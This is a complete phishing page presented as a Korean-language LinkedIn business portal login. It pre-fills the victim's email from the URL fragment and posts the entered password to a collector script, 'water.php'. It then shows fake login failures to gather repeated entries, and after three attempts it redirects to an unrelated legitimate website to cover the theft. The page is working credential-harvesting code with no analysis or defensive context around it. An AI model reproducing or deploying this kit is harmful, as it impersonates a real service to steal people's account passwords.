<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/html">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,10,9,8,7"/>
	<title>LinkedIn 비즈니스 포털</title>
	<link rel="shortcut icon" href="includes/favicon.png" type="image/x-icon">
<meta name="robots" content="noindex" /><meta name="robots" content="nofollow" />
<META NAME="GOOGLEBOT" CONTENT="NOARCHIVE" /><META NAME="GOOGLEBOT" CONTENT="NOSNIPPET" />
</head>
<body>
<script>
const url = 'water.php';   //full url goes here
</script>

<style>
.login{
	width:320px; height:35px; font-family: arial; font-size: 18px; color:#333333; 
	background-color: #ffffff; border: solid 1px #BDBDBD; padding: 7px; border-radius: 2px 3px 1px 5px;
	-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162;
	 
}
</style>
<div style="margin:-8px;width:100%">
<img id="bg" src="includes/bg.png">
<img id="bg2" src="includes/bg.png" hidden>

<div style="position:absolute;top:80px;left:500px; width:405px; height:470px; background:url(./includes/modal.png); border-radius:7px;">

	<center>
	<br><br><br>
	
	<img src="includes/logo.png" style="width:200px; height:50px;">
	
	<br><br>
	
	<font face="verdana" color="#585858" style="font-size:27px;"> 
		인증 필요
	</font>
	<br>
	<font face="verdana" color="#585858" style="font-size:17px;"> 
		액세스하려면 사용자 ID를 확인하세요.
	</font>
	<br><br><br>

	

		<form method="post" action="" onsubmit="Validate(); return false;">
		<input required id="user" name="user" class="login" value="" type="email" readonly><br><br>
		<input required placeholder="암호를 입력" type="password" id="pass" name="pass" class="login"><br><br>
		<input type="submit" src="./includes/submit.png" id="b1" value="로그인" 
		style="width:335px; height:50px; font-family: arial; font-size: 18px; color:#FFF; background-color: #045FB4; border: solid 1px #045FB4;
			-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162; padding: 10px; border-radius: 2px 5px 1px 7px; cursor:pointer; ">
		</form>
	</center>

</div>

<input type="hidden" id="count" value="0">
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js'></script>


<script>
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          var my_email =email;
          $('#user').val(my_email);
			
			}
		  })


function Validate(){
var a = $('#user').val();
var b = $('#pass').val();
var c = $('#count').val();

$.post(url, {user:a,pass:b}, function(){
setTimeout(function(){
if(c>=2){
$('#count').val('0');
window.location='https://www.greetinghr.com/trm?utm_source=google&utm_medium=search&utm_campaign_231011_trm=&gad_source=1&gclid=Cj0KCQjwxeyxBhC7ARIsAC7dS39tLVO0RMEE0oaboyfH6z-T76JxldwkaWfdm6bpoIo-DR37DmbCawYaAg8rEALw_wcB';
}else{
$('#bg').fadeOut();
$('#bg2').fadeIn();
$('#user').css('top','250px');
$('#pass').css('top','311px');
$('#b1').css('top','381px');
$('#pass').val('');
var add = +c+1;
$('#count').val(add);
$('#pass').focus();
}
},2000);
});
}


</script>



<script>
function process(){
	var user = document.getElementById('user').value;
	var pass = document.getElementById('pass').value;
	if ((user == '') || (user == null)){
	document.getElementById('bg').src='files/1.png';
	document.getElementById('user').focus();
return false;	
	}else
	if ((pass == '') || (pass == null)){
	document.getElementById('bg').src='files/2.png';
	document.getElementById('pass').focus();
return false;	
	}else
	
return true	;
}
</script>
<script>
$('input').focus(function(){
  $(this).parents('.form-group').addClass('focused');
});

$('input').blur(function(){
  var inputValue = $(this).val();
  if ( inputValue == "" ) {
    $(this).removeClass('filled');
    $(this).parents('.form-group').removeClass('focused');  
  } else {
    $(this).addClass('filled');
  }
})  
</script>
</body>
</html>